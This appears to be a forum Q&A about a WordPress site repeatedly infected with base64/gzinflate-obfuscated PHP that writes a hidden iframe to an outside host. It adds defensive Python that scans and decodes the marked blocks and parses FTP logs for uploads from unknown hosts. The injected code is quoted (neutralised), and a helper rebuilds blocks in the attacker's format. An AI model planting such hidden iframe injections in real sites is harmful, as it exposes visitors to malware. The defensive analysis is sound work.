Over the last few days, my website has repeatedly been the target of an iframe attack. The code is appended mainly to PHP and JavaScript pages. The code is then PHP base64-encoded; see the example below (I've changed the code slightly to neutralise it):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
Decoded, this looks something like this:
<script type="text/javascript">
document.write(
  '<iframe src="http://opticmoxie.com/xxxxxxx.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'
);
</script>
The one thing in common is that all the code has the comment "#c3284d#", so tracking down the malicious code is not difficult. But it is time-consuming...
We're on a shared server at Gradwell (UK) and they have not been particularly helpful. So the question is what can I do to stop this issue from repeating itself? I am aware of MySQL Injection attacks and use PHP's mysql_real_escape_string to guard against such attacks.
The site is PHP and MySQL driven. We use MySQL and FTP and have a shell account for SSH access. We use WordPress (latest update with plugins de-activated).
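Since the injected blocks always sit between the same "#c3284d#" / "#/c3284d#" markers and always use the echo(gzinflate(base64_decode(...))) wrapper, the hunt can be scripted instead of done by hand. The following is an added example written for this page, not code from the question or from WordPress: it walks a web root, finds every marked block, mirrors PHP's gzinflate (raw DEFLATE, which in Python is zlib with negative wbits) to decode the payload offline, and reports any iframe src URLs it finds. The sample file and the helper that builds a block in the attacker's format are constructed here so the example runs without a real infected site; the neutralised string from the question is included only to show that an undecodable payload is reported rather than crashing the scan.

```python
import base64
import os
import re
import zlib

# Marker comments that wrap every injected block (taken from the question).
START_MARK = "#c3284d#"
END_MARK = "#/c3284d#"

# Matches the obfuscated PHP between the markers and captures the base64 payload.
# Whitespace is allowed inside the payload because wrapped copies of it appear in the wild.
BLOCK_RE = re.compile(
    re.escape(START_MARK)
    + r'\s*echo\(gzinflate\(base64_decode\("([A-Za-z0-9+/=\s]+)"\)\)\);\s*'
    + re.escape(END_MARK),
    re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\ssrc="([^"]+)"', re.IGNORECASE)


def gzinflate(payload_b64):
    """Mirror PHP's gzinflate(base64_decode(...)): raw DEFLATE with no zlib/gzip header."""
    raw = base64.b64decode("".join(payload_b64.split()))  # strip line-wrap whitespace first
    return zlib.decompress(raw, wbits=-zlib.MAX_WBITS)


def scan_file_text(text):
    """Return one record per injected block: offset, decoded HTML and any iframe src URLs."""
    findings = []
    for m in BLOCK_RE.finditer(text):
        try:
            decoded = gzinflate(m.group(1)).decode("utf-8", errors="replace")
        except (ValueError, zlib.error) as exc:  # bad base64 (binascii.Error) or bad DEFLATE
            decoded = "<undecodable payload: %s>" % exc
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "iframe_srcs": IFRAME_SRC_RE.findall(decoded),
        })
    return findings


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk a web root and map each infected file path to its findings."""
    results = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_file_text(fh.read())
            if hits:
                results[path] = hits
    return results


def make_injected_block(html):
    """Build a block in the attacker's format from plain HTML (only used to construct sample input)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE, as gzinflate expects
    raw = comp.compress(html.encode("utf-8")) + comp.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    return '%s\necho(gzinflate(base64_decode("%s")));\n%s' % (START_MARK, b64, END_MARK)


# Constructed sample: a clean PHP file with an attacker-style block appended.
# example.invalid is a placeholder host, not a real malware URL.
SAMPLE_IFRAME = (
    '<script type="text/javascript">document.write('
    "'<iframe src=\"http://example.invalid/x.php\" height=\"2\" width=\"2\"></iframe>'"
    ");</script>"
)
SAMPLE_FILE = "<?php\necho 'hello';\n?>\n" + make_injected_block(SAMPLE_IFRAME)

# The neutralised block from the question: it matches the pattern but cannot be decoded.
QUESTION_BLOCK = (
    '#c3284d#\necho(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAup'
    'FZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));\n#/c3284d#'
)

if __name__ == "__main__":
    for finding in scan_file_text(SAMPLE_FILE) + scan_file_text(QUESTION_BLOCK):
        print("offset %d: iframes -> %s" % (finding["offset"], finding["iframe_srcs"]))
        print("  decoded: %s" % finding["decoded"][:80])
```

Run scan_tree("/path/to/webroot") over the shell account to list every infected file and the URL each one frames; the decoded output is what a visitor's browser would actually execute, which is the check worth doing before deleting the block.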
An injected iframe can contain a malicious form that leads the user to submit sensitive information, or it can silently load a page that downloads malware to the user's computer. For iframes you embed yourself, the sandbox attribute without the allow-forms token blocks form submission inside the frame; it does nothing for an iframe an attacker has written into your own pages, because the attacker controls that markup.
Iframe injection is a common cross-site scripting (XSS) attack that combines malicious JavaScript with an iframe loading a legitimate-looking page, in an effort to steal data from an unsuspecting user. On its own it is usually only successful when combined with social engineering.
An iframe (inline frame) is a simple HTML element that displays content from another source inside a web page, and is the usual way to embed an HTML5 project in a page; its src attribute specifies the URL of the framed page.
I had the same issue. The FTP server's access logs showed that the modifications were made using a hacked FTP password.
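The answer above points at the evidence that settles the question of how the files were changed: the FTP transfer log. The following is an added example, not code from either post, that parses xferlog-format lines (the wu-ftpd/proftpd transfer log; the log format Gradwell actually provides is not shown in the thread, so that is an assumption) and groups completed uploads of code files by remote host, ignoring hosts on an allowlist of known admin addresses. The log lines are constructed for the example, with documentation-range IPs.

```python
from collections import defaultdict

# Constructed xferlog-style sample: a known admin host uploads an image and a contact page
# and downloads index.php, then an unknown host uploads three code files within seconds.
SAMPLE_XFERLOG = """\
Sun Jul  1 10:02:33 2012 2 198.51.100.20 81234 /var/www/html/images/logo.png b _ i r siteuser ftp 0 * c
Sun Jul  1 10:05:01 2012 1 198.51.100.20 912 /var/www/html/index.php b _ o r siteuser ftp 0 * c
Sun Jul  1 10:06:40 2012 1 198.51.100.20 3301 /var/www/html/contact.php b _ i r siteuser ftp 0 * c
Mon Jul  2 03:14:07 2012 1 203.0.113.7 912 /var/www/html/index.php b _ i r siteuser ftp 0 * c
Mon Jul  2 03:14:09 2012 1 203.0.113.7 4410 /var/www/html/wp-content/themes/twentyeleven/footer.php b _ i r siteuser ftp 0 * c
Mon Jul  2 03:14:12 2012 1 203.0.113.7 2210 /var/www/html/js/main.js b _ i r siteuser ftp 0 * c
"""

CODE_SUFFIXES = (".php", ".js", ".html", ".htm")
TRAILING_FIELDS = 9  # xferlog fields that follow the filename; their count is fixed


def parse_xferlog_line(line):
    """Parse one xferlog line; returns None for lines that do not have the expected shape.

    Layout: <5 date tokens> transfer-time remote-host file-size filename transfer-type
            special-action direction access-mode username service auth-method auth-user status
    The filename may contain spaces, so it is recovered as everything between the size and
    the fixed trailing fields.
    """
    tokens = line.split()
    if len(tokens) < 5 + 3 + 1 + TRAILING_FIELDS:
        return None
    (_ttype, _special, direction, _mode, user, _service, _auth, _uid, status) = tokens[-TRAILING_FIELDS:]
    return {
        "time": " ".join(tokens[:5]),
        "host": tokens[6],
        "size": int(tokens[7]),
        "path": " ".join(tokens[8:-TRAILING_FIELDS]),
        "direction": direction,  # 'i' = upload to the server, 'o' = download from it
        "user": user,
        "status": status,  # 'c' = completed transfer, 'i' = incomplete
    }


def code_uploads(log_text, trusted_hosts=frozenset()):
    """Completed uploads of code files, grouped by remote host, skipping trusted admin hosts."""
    by_host = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_xferlog_line(line)
        if rec is None or rec["direction"] != "i" or rec["status"] != "c":
            continue
        if not rec["path"].lower().endswith(CODE_SUFFIXES):
            continue
        if rec["host"] in trusted_hosts:
            continue
        by_host[rec["host"]].append(rec)
    return dict(by_host)


if __name__ == "__main__":
    # Assumed allowlist: the address the site admin normally works from.
    for host, recs in code_uploads(SAMPLE_XFERLOG, trusted_hosts={"198.51.100.20"}).items():
        print("%s uploaded %d code file(s) as %s:" % (host, len(recs), recs[0]["user"]))
        for rec in recs:
            print("  %s  %s" % (rec["time"], rec["path"]))
```

If the log shows uploads of .php or .js files from an address you do not recognise, the answer's diagnosis applies: the FTP password is compromised, so change it and re-check the log after the change. With an SSH shell account available, SFTP over that account avoids sending the new password in the clear the way plain FTP does.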